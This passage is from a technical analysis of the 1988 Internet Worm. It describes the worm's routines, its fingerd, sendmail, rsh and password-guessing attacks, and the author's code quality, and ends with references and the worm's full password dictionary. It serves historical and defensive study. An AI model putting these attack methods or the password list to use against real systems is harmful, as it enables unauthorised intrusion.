check was made to be sure that an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host could be found by calling getaddrs.  If no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found, the host was marked as immune and the routine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SE. Next, the routine called other_sleep with a timeout of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that, it tried, in succession, calls to try_rsh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_fingerd,  and try_sendmail.  If the calls to try_rs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_finge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eded, the file descriptors established by those invo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passed as arguments to the sendworm call. If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infection attempts succeeded, infect returned early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of TRUE. Otherwise, the routine returned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2.24. loadobjec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outine read an object file into the objects structu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The file was opened and the size found with a cal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routine fstat.  A buffer was malloc'd of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, and a call to read was made to read the cont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The buffer was encrypted with a call to xorbuf,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red into the objects array. The suffix of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(e.g., sun3.o, l1.c, vax.o\) was saved in a fiel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, as was the size of the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2.25. makemagi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utine used the library random call to generate a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for use as a challenge number. Next, it tried to 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telnet port \(#23\) of the target host, us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e address currently known for that host. If a success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 was made, the library call getsockname was call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he canonical IP address of the current host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. Next, up to 1024 attempts were made to establish a TC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cket, using port numbers generated by taking the outp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 number generator modulo 32767. If the connec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ful, the routine returned the port number,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or of the socket, the canonical IP address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, and the challenge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2.26. netmask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outine stepped through the interfaces array and check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address against those interfaces. If it found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was reachable through a connected interface, the netm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was the netmask associated with that interf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, the return was the default netmask based on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\(Class A, Class B, Class C\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2.27. other_slee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outine checked a global variable named other_fd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was less than zero, the routine simply called sleep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vided timeout argument, then returned. Otherwis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 waited on a select system call for up to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out. If the timeout expired, the routine returned. Otherwi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elect return code indicated there was input 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_fd descriptor, it meant there was another wor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machine. A connection was established and an exch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`magic'' numbers was made to verify identity. The local w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wrote a random number \(produced by random\) to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m via the socket. The reply was read and a check was ma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ure that the response came from the localhost \(127.0.0.1\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descriptor was closed. If the random value sent plu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 was an odd number, the other_fd variable was set to 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pleasequit variable was set to 1. This mean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worm would die when conditions were right \(cf. doit \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at it would no longer attempt to contact other worm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machine. If the sum was even, the other worm was dest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2.28. permu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outine randomized the order of a list of objects. Thi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by executing a loop once for each item in the list.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ration of the loop, the random number generator wa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o the number of items in the list. The item in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ed by that value was swapped with the item in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ed by the current loop value \(via a call to bcopy\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2.29. rt_in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itialized the list of gateways. It started by set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counter, ngateways,  to zero. Next, it invok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``/usr/ucb/netstat -r -n'' using a popen call. Th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looped while output was received from the netstat command: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was read. A call to other_sleep was made with a time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. The input line was parsed into a destination and a gate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gateway was not a valid IP address, or if it w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pback address \(127.0.0.1\), it was discarded. The valu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compared against all the gateway addresses already know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licates were skipped. It was also compared against the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interfaces \(local networks\), and discarded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licate. Otherwise, it was added to the list of gateway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unter increme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2.30. scan_gateway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the code called permute to randomize the gateways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it looped over each gateway or the first 20, whichever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: A call was made to other_sleep with a timeout of zero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teway IP address was searched for in the host list; a new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allocated for the host if none currently existed. The gate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 was set in the flags field of the host entry. A call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to the library routine gethostbyaddr with the IP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teway. The name, aliases and address fields were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st list, if not already present. Then a call was ma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hostbyname and alternate addresses were added to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. After this loop was executed, a second loop was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id effectively the same thing as the first!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 reason why this was done, unless it is a remnant of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, or a stub for future addi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2.31. send_mess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outine made a call to random and 14 out of 15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without doing anything. In the 15th case, it open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am socket to host ``ernie.berkeley.edu'' and then tr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an uninitialized byte using the sendto call. This w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\(using a UDP send on a TCP socket\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2.32. sendwo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outine sent the worm code over a connected TCP circui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te machine. First it checked to make sure that the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held a copy of the l1.c code \(see Appendix B\). Next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makemagic to get a local socket established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a challenge string. Then, it encoded and wro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detailed previously in \2474-2a. Finally, it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hit and returned the result code of that routine. Th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shipped across the link were decrypted in memory first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to xorbuf and then re-encrypted afterwa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2.33. supports_rs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outine determined if the target host, specified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, supported the BSD- derived rsh protocol. It did thi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a socket and attempting a TCP connection to port 514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mote machine. A timeout or connect failure caused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ALSE; otherwise, the socket was closed and the return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2.34. supports_teln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outine determined if a host was reachable and suppor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net protocol \(i.e., was probably not a router or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`dumb'' box\). It was similar to supports_rsh in natur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established a socket, connected to the remote mach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23, and returned FALSE if an error or timeout occurr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, the socket was closed and TRUE wa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2.35. try_finge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outine tried to establish a connection to a remote fi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emon on the given host by connecting to port 79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 succeeded, it sent across an overfull buffe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in \2474-8b and waited to see if the other side be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hell. If so, it returned the file descriptors to the calle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, it closed the socket and returned a failure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2.36. try_pass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outine called crypt with the password attempt and comp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 against the encrypted password in the pwd ent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user. If a match was found, the unencrypted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copied into the pwd structure, and the routine attack_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2.37. try_rs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created two pipes and then forked a child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ild process attempted to rexec a remote shell on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in the parameters, using the specified user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. Then the child process tried to invoke the rsh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ttempting to run, in order, ``/usr/ucb/rsh,'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`/usr/bin/rsh,'' and ``/bin/rsh.'' If the remote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eded, the function returned the file descriptors of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pe. Otherwise, it closed all file descriptors, killed the ch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SIGKILL, and reaped it with a call to wait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2.38. try_sendmai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outine attempted to establish a connection to the SMTP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(#25\) on the remote host. If successful, it conduc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 explained in \2474-2b. It then called the waithit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e if the infection ``took.'' Return codes were checke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line was transmitted, and if a return code indicat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, the routine aborted after sending a ``quit''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2.39. waith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acted as the bootstrap server for a vecto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remote machine. It waited for up to 120 seco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cket created by the makemagic routine, and if no connec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it closed the socket and returned a failure code. Likewi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irst thing received was not the challenge string shi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bootstrap program, the socket was closed and the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. The routine decrypted each object file using xorbu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 it across the connection to the vector program \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ix B\). Then a script was transmitted to compile an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ctor. This was described in \2474-4. If the remote hos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fully infected, the infected flag was set in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and the socket closed. Otherwise, the routine sent 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strings to delete each object file. The function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ccess or failure of the inf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2.40. xorbu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outine was somewhat peculiar. It performed a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ryption/decryption function by XORing the buffer passed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with the first 10 bytes of the xorbuf routine itself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de would not work on a machine with a split I/D spa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agged architectu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nalysis of the C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1. Structure and Sty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amination of the reverse-engineered code of the wor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ve. Although it is not the same as reading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, it does reveal some characteristics of the author\(s\)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lusion that may surprise some people is that the qua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de is mediocre, and might even be considered poor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, there are places where calls are made to function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too many or too few arguments. Many routines have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that are either never used, or are potential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y are initialized. In at least one location, a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assed as an argument rather than the address of the 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so dead code, as routines that are never referenc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s code that cannot be executed because of condi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ever met \(possibly bugs\). It appears that the author\(s\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used the lint utility on the program. At many plac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, there are calls on system routines and the return c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checked for success. In many places, calls are mad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heap routine, malloc and the result is immediate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ny check. Although the program was configured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a core file or other evidence if a fatal failure occur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ck of simple checks on the return codes is indicativ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ppiness; it also suggests that the code was written an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inimal or no testing. It is certainly possible tha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s were written into the code and elided subj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al compilation flags. However, there would be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 to remove those checks from the production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. The structures chosen for some of the internal data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revealing. Everything was represented as linked lis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s. All searches were done as linear passes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list. Some of these lists could get quite lo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tless that considerable CPU time was spent by the worm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aining and searching these lists. A little extra co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 hash buckets or some form of sorted lists w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little overhead to the program, yet made it much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icient \(and thus quicker to infect other hosts and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vious to system watchers\). Linear lists may be easy to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any experienced programmer or advanced CS student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implement a hash table or lists of hash bucket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difficulty. Some effort was duplicated in spots.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of this was in the code that tried to break passwo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if the password to an account had been found in an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ge of execution, the worm would encrypt every wor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y and attempt a match against it. Similar redundancy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found in the code to construct the lists of hosts to inf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locations in the code where it appear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\(s\) meant to execute a particular function but us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ong invocation. The use of the UDP send on a TCP socket i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aring example. Another example is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here the code sends a KILL signal to its parent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rrounding code gives strong indication that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meant to do a killpg instead but used the wrong c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section of code that appears particularly well-thou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involves the crypt routines used to check passwords. As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noted in [Seel88], this code is nine times fast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Berkeley crypt function. Many interesting modif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made to the algorithm, and the routines do not appe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written by the same author as the rest of the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ly, the routines involved have some support for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ryption anddecryption\320even though only encryp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for the worm. This supports the assumption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 was written by someone other than the author\(s\)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and included with this code. It would be interes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ver where this code originated and how it cam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m program. The program could have been much more virulent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\(s\) been more experienced or less rushed in her/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ing. However, it seems likely that this code had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d over a long period of time, so the only conclus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drawn is that the author\(s\) was sloppy or careless \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\), and perhaps that the release of the worm was prema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2. Problems of Functional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little argument that the program was functional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, we all wish it had been less capable! However, we are luck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ense that the program had flaws that prevented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to the fullest. For instance, because of an erro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would fail to infect hosts on a local area network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 it might identify such hosts. Another examp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ed functionality concerns the gathering of hostnam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. As noted already, the code failed to gather host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From user .rhosts files early on. It also did not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 host names from other user and system files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names \(e.g., /etc/hosts.lpd\). Many of the operations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done ``smarter.'' The case of using linear stru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lready been mentioned. Another example would have b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 user passwords by the salt used. If the same sal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in more than one password, then all those passwords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hecked in parallel as a single pass was made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ies. On our machine, 5% of the 200 passwords sh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salts, for instance. No special advantage was tak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t password was compromised. Once the root password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ken, it is possible to fork children that set their ui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variables to match each designated user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es could then attempt the rsh attack described earli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port. Instead, root is treated as any other account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suggested to me that this treatment of root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a conscious choice of the worm author\(s\). Without kn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ue motivation of the author, this is impossible to deci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considering the design and intent of the program, I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ifficult to believe that such exploitation would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itted if the author had thought of it. The same attack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nger daemon could have been extended to the Sun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, but was not. The only explanations that come to m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this was not done are that the author lacked the motiv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ility, the time, or the resources to develop a ver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n. However, at a recent meeting, Professor Rick Rashi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negie-Mellon University was heard to claim that Robert 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ris, the alleged author of the worm, had revealed the finge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to system administrative staff at CMU well over a year a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is report is correct and the worm author is indeed M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ris, it is obvious that there was sufficient time to con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un version of the code. In fact, I asked three Purdue gradu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s \(Shawn D. Ostermann, Steve J. Chapin, and Jim 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iffoen to develop a Sun 3 version of the attack, and they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n under three hours. The Worm author certainly must have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o Suns or else he would not have been able to provide S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ies to accompany the operational worm. Motivation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not be a factor considering everything else prese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With time and resources available, the only reason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immediately rule out is that he lacked the knowled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implement a Sun version of the attack. This seemsunlik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given the inconsistent nature of the rest of the code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ly a possibility. However, if this is the case, it rai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question: was the author of the Worm the original auth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X fingerd attack? Perhaps the most obvious shortcom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de is the lack of understanding about propagation and lo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son the worm was spotted so quickly and caused so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ruption was because it replicated itself exponentially o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s, and because each worm carried no history with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ttedly, there was a check in place to see i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was already infected, but one out of every seven w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never die even if there was an existing infes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more, worms marked for self-destruction would contin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 up to the point of having made at least one complete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password file. Many approaches could have been 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author\(s\) to slow the growth of the worm or pr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infestation; little is to be gained from explaining them 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ir absence from the worm program is telling. Ei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\(s\) did not have any understanding of how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propagate, or else she/he/they did not care; the exist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Worm of mechanisms to limit growth tends to indica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a lack of understanding rather than indifference.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gorithms used by the Worm were reasonably clever. O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is interesting to note: when trying passwor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-in list, or when trying to break into connected host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m would randomize the list of candidates for trial. Thus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one worm were present on the local machine, they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more likely to try candidates in a different order,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izing their coverage. This implies, however \(as do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 of the pleasequit variable\) that the author\(s\)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y concerned with the presence of multiple worms o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. More to the point, multiple worms were allowed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n an effort to maximize the spread of the infection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supports the contention that the author did not under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agation or load effects of the Worm. The desig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tor program, the ``thinning'' protocol, and the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state machine were all clever and non-obviou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all structure of the program, especially the cod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P addresses, indicates considerable knowledge of net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routines available to support it. The knowledge evide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at code would indicate extensive experience with net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ies. This, coupled with some of the errors in the W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related to networking, further support the thesi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was not a careful programmer\320the errors in those p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ode were probably not errors because of ignoran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experi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3. Camoufl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 care was taken to prevent the worm program from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ped. This can be seen by the caution with which new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introduced into a machine, including the use of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llenges. It can be seen by the fact that every string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worm was encrypted to prevent simple examination.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idenced by the care with which files associated with the w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deleted from disk at the earliest opportunity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contents were encrypted in memory when loaded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evidenced by the continual forking of the proces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(faulty\) check for other instances of the worm on the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. The code also evidences precautions against prov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of itself to anyone seeking to stop the worm. It set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 limits so it cannot dump a core file, and it kee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data encrypted until used. Luckily, there ar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of obtaining core files and data images, and researc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able to obtain all the information they n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ssemble and reverse-engineer the code. There is no doub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at the author\(s\) of the worm intended to make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 as difficult as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4. Specific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more specific comments are worth making. These are dir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articular aspects of the code rather than the program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4.1. The sendmail attac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sites tend to experience substantial loads because of heav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traffic. This is especially true at sites with mailing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oders. Thus, the administrators at those site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d their mailers to queue incoming mail and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ue periodically. The usual configuration is to set send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the queue every 30 to 90 minutes. The attack through send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fail on these machines unless the vector program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vered into a nearly empty queue within 120 seconds o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processed. The reason for this is that the infecting w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only wait on the server socket for two minute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vering the ``infecting mail.'' Thus, on systems with de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ues, the vector process would not get built in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the main worm program over to the target. The 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would fail in its connection attempt and exi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zero status. Additionally, the attack through send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ked the vector program without a specific path. That i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as invoked with ``foo'' instead of ``./foo'' as was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hell-based attack. As a result, on systems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path used by sendmail's shell did not conta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\(``.''\), the invocation of the code would fail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noted that such a failure interrupts the process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quent commands \(such as the rm of the files\), and thi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why many system administrators discovered copies of the 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source code in their /usr/tmp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4.2. The machines involv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has already been noted, this attack was made only on Sun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s and VAX machines running BSD UNIX.  It has been ob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t least one mailing list that had the Sun code been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-mc68010 flag, more Sun machines would have fa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tim to the worm. It is a matter of some curiosity wh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s were not targeted for this attack. In particular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many Pyramid, Sequent, Gould, Sun 4, and Sun i386 machin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binary files for those had also been included, the worm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spread much further. As it was, some locations such as Oh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were completely spared the effects of the worm becaus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``known'' machines were of a type that the worm c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. Since the author of the program knew how to break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itrary UNIX machines, it seems odd that he/she did not at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pile the program on foreign architectures to includ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4.3. Portability considera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\(s\) of the worm may not have had much experien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portable UNIX code, including shell scripts. Cons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n the shell script used to compile the vecto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command is used: if [ -f sh ] The use of the [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as a synonym for the test function is not univers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X users with experience writing portable shell files te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 out the operator test rather than rely on therebeing a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file named ``['' on any particular system. They also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test operator is built-in to many shells and thus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external [ variant. The test invocation used in the w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also uses the -f flag to test for presence of the fil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.  This provided us with the worm ``condom'' published Thurs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gh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a directory with the name sh in /usr/tmp caus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to fail, as do later attempts to create executable fil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name. Experienced shell programmers tend to use the -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(exists\) flag in circumstances such as this, to detect no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, but sockets, devices, named FIFOs, etc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oquialisms are present in the code that bespeak a lac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ence writing portable code. One such example is th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p where file units are closed just after the vecto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s executing, and again in the main program just afte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s executing. In both programs, code such as the follow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d: for \(i = 0; i &lt; 32; i++\) close\(i\); The portabl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complish the task of closing all file descriptors \(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rkeley-derived systems\) is to execute: for \(i = 0; i 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dtablesize\(\); i++\) close \(i\); or the even more ef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\(i = getdtablesize\(\)-1; i &gt;= 0; i--\) close\(i\);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number of file units available \(and thus open\)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y from system to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5. Summa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other examples can be drawn from the code, but the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obvious by now: the author of the worm program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a moderately experienced UNIX programmer, but s/he was by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the ``UNIX Wizard'' many have been claiming. Th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loys a few clever techniques and tricks, but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t if they are all the original work of the Worm autho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seems to be the product of an inexperienced or s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. The person \(or persons\) who put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 appears to lack fundamental insight into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s, data structures, and network propagation, bu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time has some very sophisticated knowledge of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and facilities. The code does not appear to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ed \(although anything other than unit testing w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to do\), or else it was prematurely released. Actually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ossible that both of these conclusions are correc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ce of so much dead and duplicated code coupl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of some data structures \(such as the 20-slot object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y\) argues that the program was intended to b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hens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Conclus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clear from the code that the worm was deliberately d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wo things: infect as many machines as possible, an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 to track and stop. There can be no question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in any way an accident, although its release may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mature. It is still unknown if this worm, or a futur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, was to accomplish any other tasks. Although an autho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alleged \(Robert T. Morris\), he has not publicly conf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 has the matter been definitively proven. Conside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ility of both civil and criminal legal action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ssion and an explanation are unlikely to be forthcom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soon. Speculation has centered on motivations as divers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nge, pure intellectual curiosity, and a desire to im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one. This must remain speculation for the time be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since we do not have access to a definitive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From the author\(s\). At the least, there must be some qu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e psychological makeup of someone who would build an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people have stated that the authors of this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have been ``computer geniuses'' of some sort. I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ered by that supposition since first hearing it, an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examined the code in some depth, I am convinced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s not evidence to support any such claim. The cod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rently unfinished and done by someone clever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ly gifted, at least in the way we usually assoc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alented programmers and designers. There were many bu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takes in the code that would not be made by a carefu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etent programmer. The code does not evidence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ing of good data structuring, algorithms, or eve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 flaws in UNIX. It does contain clever exploit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specific flaws in system utilities, but that is har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idence of genius. In general, the code is not that impress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``success'' was probably due to a large amount of lu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any programming skill possessed by the author. Ch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vored most of us, however. The effects of this worm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(largely\) benign, and it was easily stopped. Had the cod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ed and developed further by someone more experienced, or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been coupled with something destructive, the toll w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considerably higher. I can easily think of several doz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who could have written this program, and not only don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far fewer \(if any\) errors, but made it considerab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lent. Thankfully, those individuals are all responsi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dicated professionals who would not consider such an act.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learn from this about securing our systems will help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is the only such incident we ever need to analyz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k should also point out that we need a better mechanis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to coordinate information about security flaws and attac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ponse to this incident was largely ad hoc, and resul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duplication of effort and a failure to disseminate valu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to sites that needed it. Many site administra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vered the problem from reading the newspaper or watch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vision. The major sources of information for m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es affected seems to have been Usenet news groups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ing list I put together when the worm was first discov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useful, these methods did not ensure timely, widesp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semination of useful information \320 especially sinc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ed on the Internet to work! Over three weeks afte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dent some sites are still not reconnected to the Intern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second time in six months that a major panic has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net community.The first occurred in May when a rum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ept the community that a ``logic bomb'' had been planted in S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by a disgruntled employee. Many, many sites turne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clocks back or they shut off their systems to pr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. The personnel at Sun Microsystems responded to this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rable fashion, conducting in-house testing to isolat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threat, and issuing information to the community about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al with the situation. Unfortunately, almost everyone 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s to have watched events unfold, glad that they were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s who had to deal with the situation. The worm has shown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e are all affected by events in our shared environmen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need to develop better information methods outside the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next crisis. This whole episode should cause u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 about the ethics and laws concerning access to compu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chnology we use has developed so quickly it is not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to determine where the proper boundaries of moral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. Many senior computer professionals started their care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s ago by breaking into computer systems at their colleg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s of employment to demonstrate their expertise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have changed and mastery of computer science and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ering now involves a great deal more than can be show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intimate knowledge of the flaws in a particular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Entire businesses are now dependent, wisely or not,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systems. People's money, careers, and possibly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lives may be dependent on the undisturbed functio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. As a society, we cannot afford the consequenc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oning or encouraging behavior that threatens or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systems. As professionals, computer scient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engineers cannot afford to tolerate the romantic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mputer vandals and computer criminals. This inciden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mpt some discussion about distribution of securi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information. In particular, since hundreds of site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`captured'' the binary form of the worm, and since personnel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sites have utilities and knowledge that enables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rse-engineer the worm code, we should ask how long we ex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o be beneficial to keep the code unpublished? As I ment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introduction, at least five independent group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d reverse-engineered versions of the worm, and I ex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more have been done or will be attempted, especially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versions are kept private. Even if none of thes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ublished in any formal way, hundreds of individuals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access to a copy before the end of the year. Historic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ing to ensure security of software through secrecy has pro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ineffective in the long term. It is vital that we edu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administrators and make bug fixes available to the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way that does not compromise their security. Method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ent the dissemination of information appear to be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ary to that goal. Last, it is important to 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ure of both the Internet and UNIX helped to defeat the worm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as spread it. The immediacy of communication, the a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source and binary files from machine to machin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espread availability of both source and expertise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nel throughout the country to work together to sol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ion even despite the widespread disconnection of par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twork. Although the immediate reaction of some people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o restrict communication or promote a d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patible software options to prevent a recurrence of a wo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ould be entirely the wrong reaction. Increa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tacles to open communication or decreasing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with access to in-depth information will not prev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d attacker\320it will only decrease the poo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tise and resources available to fight such an att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, such an attitude would be contrary to the whole pur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having an open, research-oriented network. The Worm was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breakdown of ethics as well as lapses in security\320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ely technological attempt at prevention will not add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problem, and may just cause new difficul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knowledg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of this analysis was performed on reverse-engine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the worm code. The following people were involv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duction of those versions: Donald J. Becker of Harr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oration, Keith Bostic of Berkeley, Donn Seele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 of Utah, Chris Torek of the University of Maryl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e Pare of FX Development, and the team at MIT: Mark W. Eich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ley R. Zanarotti, Bill Sommerfeld, Ted Y. Ts'o, Jon Rochl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n Raeburn, Hal Birkeland and John T. Kohl. A disassem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the worm code was provided at Purdue by staff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due University Computing Center, Rich Kulawiec in particul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the individuals who reviewed early drafts of this pa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ntributed their advice and expertise: Don Becker, Kat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phy, Brian Kantor, R. J. Martin, Richard DeMillo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ally Keith Bostic and Steve Bellovin. My thanks t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individuals. My thanks and apologies to anyone who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credited and was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m83. Allman, Er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mail\320An Internetwork Mail Rou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 of California, Berkeley, 1983. Issued with the BS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X documentation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un75. Brunner, John, The Shockwave Rider, Harper &amp; Row, 197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he84. Cohen, Fred, ``Computer Viruses: The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ments,'' PROCEEDINGS OF THE 7TH NATIONAL COMPUTER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RENCE, pp. 240-263, 198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n88. Denning, Peter J., ``Computer Viruses,'' AMERI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IENTIST, vol. 76, pp. 236-238, May-June 198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wd85. Dewdney, A. K., ``A Core War Bestiary of viruses, wor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ther threats to computer memories,'' SCIENTIFIC AMERIC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. 252, no. 3, pp. 14-23, May 198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rr72. Gerrold, David, When Harlie Was One, Ballentine Boo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72. The first ed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m84. Grampp, Fred. T. and Robert H. Morris, ``UNIX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Security,'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&amp;T BELL LABORATORIES TECHNICAL JOURNAL, vol. 63, no. 8, part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p. 1649-1672, Oct. 198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r77. Harrenstien, K., ``Name/Finger,'' RFC 742, SRI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Center, December 197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r79. Morris, Robert and Ken Thompson, ``UNIX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,'' COMMUNICATIONS OF THE ACM, vol. 22, no. 11, pp. 594-</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>597, ACM, November 197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82. Postel, Jonathan B., ``Simple Mail Transfer Protocol,'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FC 821, SRI Network Information Center, August 198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id87. Reid, Brian, ``Reflections on Some Recent Widesp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Breakins,'' COMMUNICATIONS OF THE ACM, vol. 30, no.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p. 103-105, ACM, February 198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tc79.Ritchie, Dennis M., ``On the Security of UNIX, '' in U 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ef IX nt 0 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EMENTARY DOCUMENTS, AT &amp; T, 1979. Seel88. Seeley, Donn, ``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r of the Worm,'' TECHNICAL REPORT, Computer Science Dept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 of Utah, November 1988. Unpublished re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c82. Shoch, John F. and Jon A. Hupp, ``The Worm Programs \3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y Experience with a Distributed Computation,''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ACM, vol. 25, no. 3, pp. 172-180, ACM, March 198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ppendix A The Dictiona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follows is the mini-dictionary of word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m. These were tried when attempting to break user passwo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ing through this list is, in some sense revealing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raises a significant question: how was this list chosen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sumption has been expressed by many people that this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s words commonly used as passwords; this seems unlik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 choices for passwords usually include fantasy charac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is list contains none of the likely choices \(e.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`hobbit,'' ``dwarf,'' ``gandalf,'' ``skywalker,'' ``conan''\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of relatives and friends are often used, and we see wome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like ``jessica,'' ``caroline,'' and ``edwina,'' bu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 of the common names ``jennifer'' or ``kathy.'' Fur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lmost no men's names such as ``thomas'' or eith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`stephen'' or ``steven'' \(or ``eugene''!\). Additionally, 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se have the initial letters capitalized, although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 how they are used in passwords. Also of interest,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obscene words in this dictionary, yet many repor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rted password cracking experiments have revealed that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 significant number of users who use such words \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rases\) as passwords. The list contains at least one in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ing: ``commrades'' instead of ``comrades''; I also bel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``markus'' is a misspelling of ``marcus.'' Some of the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appear in standard dictionaries and are non-English nam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`jixian,'' ``vasant,'' ``puneet,'' etc. There are also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usual words in this list that I would not expec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ed common: ``anthropogenic,'' ``imbroglio,'' ``umesh,'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`rochester,'' ``fungible,'' ``cerulean,'' etc. I imagin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st was derived from some data gathering with a limite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asswords, probably in some known \(to the author\) comp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. That is, some dictionary-based or brute-force at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used to crack a selection of a few hundred passwords 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From a small set of machines. Other approaches to gath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s could also have been used\320Ethernet monitors, Troj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se login programs, etc. However they may have been crac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s that were broken would then have been added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y. Interestingly enough, many of these words are no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 on-line dictionary \(in /usr/dict/words\). As su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ords are useful as a supplement to the main dictiona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attack the worm used as strategy #4, but I would su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to be of limited use before that time. This un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sition might be useful in the determin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\(s\) of this code. One approach would be to find a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user or local dictionary containing these words.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to find some system\(s\) where a significant quant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s could be broken with this list. aaa academia aerob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plane albany albatross albert alex alexander algebra ali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bet ama amorphous analog anchor andromache animals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hropogenic anvils anything aria ariadne arrow arthur athe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mosphere aztecs azure bacchus bailey banana bananas ban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ks barber baritone bass bassoon batman beater beauty beetho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ved benz beowulf berkeley berliner beryl beverly bicam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b brenda brian bridget broadway bumbling burgess campan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tor cardinal carmen carolina caroline cascades castle c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yuga celtics cerulean change charles charming charon che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gar classic clusters coffee coke collins commrades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o cookie cooper cornelius couscous creation creosote cr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emon dancer daniel danny dave december defoe deluge des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 dieter digital discovery disney dog drought duncan e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r edges edinburgh edwin edwina egghead eiderdown eil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stein elephant elizabeth ellenemeraldengine engine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prise enzyme ersatz establish estate euclid evelyn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rway felicia fender fermat fidelity finite fishers fl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 flower flowers foolproof football foresight format forsy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ier fred friend frighten fun fungible gabriel gard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rfield gauss george gertrude ginger glacier gnu golfer gorge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rges gosling gouge graham gryphon guestguitargumption gunt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cker hamlet handily happening harmony harold harvey hebr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inlein hello help herbert hiawatha hibernia honey horse ho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tchins imbroglio imperial include ingres inna innocu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ishman isis japan jessica jester jixian johnny joseph joshu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dith juggle julia kathleen kermit kernel kirkland knight la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mbda lamination larkin larry lazaruslebesguelee leland lero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wis light lisa louis lynne macintosh mack maggot magic malcol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markus marty marvin master maurice mellon merlin m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hael michelle mike minimum minsky moguls moose morley moz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ncy napoleon nepenthe ness network newton next nox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trition nyquist oceanography ocelot olivetti olivia oracle or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well osirisoutlawoxford pacific painless pakistan pam pap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 patricia penguin peoria percolate persimmon persona p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ter philip phoenix pierre pizza plover plymouth polynom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ndering pork poster praise precious prelude prince prince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 protozoa pumpkin puneet puppet rabbit rachmanin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nbow raindrop raleigh random rascal really rebecca remote r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pple robotics rochesterrolexromano ronald rosebud rose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s ruben rules ruth sal saxon scamper scheme scott sco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ret sensor serenity sharks sharon sheffield sheldon shiv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vers shuttle signature simon simple singer single smile sm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ooch smother snatch snoopy soap socrates sossina sparrows sp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ing springer squires strangle stratford stuttgart sub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 summer supersuperstage support supported surfer suzan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earer symmetry tangerine tape target tarragon taylor tele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tation thailand tiger toggle tomato topography torto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yota trails trivial trombone tubas tuttle umesh unhappy unico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known urchin utility vasant vertigo vicky village virgin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en water weenie whatnot whiting whitney will willi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iamsburg willie winston wisconsinwizardwombat woodw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mwood yacov yang yellowstone yosemite zap zimmerm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ix B The Vec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m was brought over to each machine it infected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s of a small program I call the vector program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s have been referring to this as the grappling h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Some people have referred to it as the program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the suffix used on each copy. The source for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transferred to the victim machine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discussed in the paper. It would then be compil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ked on the victim machine with three command line argum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nonical IP address of the infecting machine,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CP port to connect to on that machine to get copi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worm files, and a magic number that effectively act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-time-challenge password. If the ``server'' worm on the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and port did not receive the same magic number back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the transfer, it would immedi- ately disconnec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tor program. This can only have been to prevent some- on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ing to ``capture'' the binary files by spoofing a w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`server.'' This code also goes to some effort to hide itsel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by zeroing out the argu- ment vector, and by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king a copy of itself. If a failure occurred in transfer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the code deleted all files it had already transferr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exited. One other key item to note in this code i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tor was designed to be able to transfer up to 20 files;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with only three. This can only make one wonder if a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ve version of the worm was planned for a later dat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at version might have carried with it other command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 data, or possibly local virus or trojan horse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&lt;what follows is a pair of programs that I was unable to de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dependability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SD is an acronym for Berkeley Software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X is a registered trademark of AT&amp;T Laborato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X is a trademark of Digital Equipment Corpo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edition of the book, just published,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`updated'' to omit this subplot about  VIRU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Page: 4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robably a coincidence that the Internet Worm was loo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mber 2, the eve of this ``birthday.''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 widely used alternative to sendmail, MMDF,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ed as too complex and large by  many users. Further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perceived to be as flexible as sendmail if it is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stablish special  addressing and handling rules when brid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erogeneous networ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ctly speaking, the password is not encrypted. A block of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s is repeatedly encrypted using  the user password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of this encryption is what is saved. See [Morr79]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detai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 list would likely include all words in the dictionar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rse of all such words, and a large  collection of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xec is a remote command execution service. It requires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name/password combination be  supplied as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as compiled in as port number 23357, on host 127.0.0.1 \(loopback\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CP port 11357 on host 128.32.137.13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ingly, although the program was coded to get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host on the remote end of  point-to-point links, n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s to have been made of that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f some of them aren't suspicious enough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ppears to be a bug. The probable assumption wa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 hl would handle infection of local hosts, but hl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outine! Thus, local hosts were never infected via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puzzling. The appropriate file to scan for equiva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s would have been the .rhosts file, not the .forward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ate communication from someone present at the mee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ought of a Sequent Symmetry or Gould NP1 infec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copies of the worm presents an awesome \(and awful\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t. The effects noticed locally when the worm broke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ly unloaded VAX 8800 were spectacular. The effect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with one or two orders of magnitude more capacity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ghtening thou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d by Kevin Braunsdorf and Rich Kulawiec at Purdue PUC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k Adams, of the Center for Seismic Studies, has comment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may someday hear that the worm was loosed to impress Jo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ster. Without further information, this is as vali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ulation as any other, and should raise further disturb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; not everyone with access to computers is ration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e, and future attacks may reflect th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out this paper I have been writing author\(s\)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. It occurs to me that most of the mail, Usenet post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edia coverage of this incident have assumed that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\(singular\). Are we so unaccustomed to working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programs that this is our natural inclination? Or is i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find it hard to believe that more than one individual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such poor judgement? I also noted that most of peopl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ke with seemed to assume that the worm author was male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it to others to speculate on the value, if any,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